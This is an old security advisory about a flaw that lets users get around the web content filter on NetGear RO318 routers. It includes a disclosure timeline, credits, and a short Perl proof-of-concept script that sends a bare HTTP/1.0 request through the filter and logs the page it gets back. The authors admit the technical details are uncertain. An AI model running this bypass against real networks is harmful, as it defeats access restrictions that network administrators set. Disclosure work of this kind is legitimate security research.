=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ NetGear RO318 HTTP Filter Advisory =+
=+ Null Byte Security =+
=+ http://home.tampabay.rr.com/nbs/ =+
=+ don't call it a come back =+
=+ nbs@tampabay.rr.com =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ Contents Table =+
=+ =+
=+ 1.About =+
=+ 2.Affected =+
=+ 3.Details =+
=+ 4.Contact =+
=+ 5.Conclusion =+
=+ 6.Thanks =+
=+ 7.Greets =+
=+ 8.POC =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 1.About =+
=+ =+
=+ NETGEAR's sturdy metal RO318 Cable/DSL Security Router with 8-port switch =+
=+ fully protects your small office network against intrusion. Equipped with =+
=+ Stateful Packet Inspection to prevent Denial of Service (DoS) attacks, and =+
=+ Network Address Translation (NAT) to maintain network security against =+
=+ hackers, it ensures prolonged up time and maximized productivity for your =+
=+ network. Web content filtering options let network administrators establish =+
=+ restricted access policies - based on the time of day, day of week, Web =+
=+ address keyword - and receive regular reports and instant alerts via e-mail on =+
=+ hacker attempts and browsing activities. Web-based installation instructions =+
=+ make setup easy. Your network up and running, and sharing high-speed Internet =+
=+ access with up to 253 users, in less than an hour. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 2.Affected =+
=+ =+
=+ NetGear RO318 Cable/DSL Security Router =+
=+ =+
=+ Although the NetGear RO318 is the only router listed here we are sure there =+
=+ other routers that use the RO318's web filtering technology. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 3.Details =+
=+ =+
=+ We are not too sure of the details ourselves because of time restraints, but =+
=+ we do have an idea. One, the web filtering component in the firmware only =+
=+ checks for fully constructed requests and thus sending a malformed, somewhat, =+
=+ request results in the retrieval of restricted content. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 4.Contact =+
=+ =+
=+ December 2 2001: Contacted NetGear =+
=+ December 2 2001: Contacted online support =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460001) =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460003) =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460006) =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460008) =+
=+ December 8 2001: Five working days passed =+
=+ December 20 2001: Eighteen days passed =+
=+ December 20 2001: Advisory released on home.tampabay.rr.com/nbs/ =+
=+ December 26 2001: POC released =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 5.Conclusion =+
=+ =+
=+ This is definitely a security vulnerability and not a feature. We hope Net =+
=+ Gear will fix this with their next firmware release so administrators can =+
=+ restrict necessary web-content without having to worry about this bug. =+
=+ =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 6.Thanks =+
=+ =+
=+ Bi0cide for the help =+
=+ Datagram for the help =+
=+ Natas for the help =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 7.Greets =+
=+ =+
=+ Bi0cide, Natas, Datagram, Z, Medium, BrainStorm, Qitest1, Skerbi, RootX11, =+
=+ Doug, Bios Disk, Decypher, Notten, RFP, Johnny (johnny.ihackstuff.com), RFP, =+
=+ Mixter, Pimpshiz, Doxavg, Todd, Sekurity Inc (www.sekurity.net), Packet Storm, =+
=+ Security Focus, and everyone else. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 8.POC =+
=+ =+
#!/usr/bin/perl
#don't call it a come back
#nbs@tampabay.rr.com
use IO::Socket;
use Getopt::Std;
getopts('h:p:z', \%argv);
if(!defined($argv{h}))
{
print"NetGear RO318 Web Filter Bypass Exploit by Null Byte Security \n";
print"Usage: $0 -h <host> -p <port> \n";
exit;
}
if(defined($argv{h}))
{
&begin
}
sub begin
{
$html = html;
$host = $argv{h};
if(defined $argv{p})
{
$port=$argv{p};
}
else
{
$port = "80";
}
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $host,
PeerPort => "$port")
or die "Connection Refused.\n";
print $socket "GET / HTTP/1.0\n\n";
while (<$socket>)
{
open(LOG, ">>$html");
print (LOG);
}
close $socket;
}
=+ =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ http://www.wiretrip.net/rfp/policy.html =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+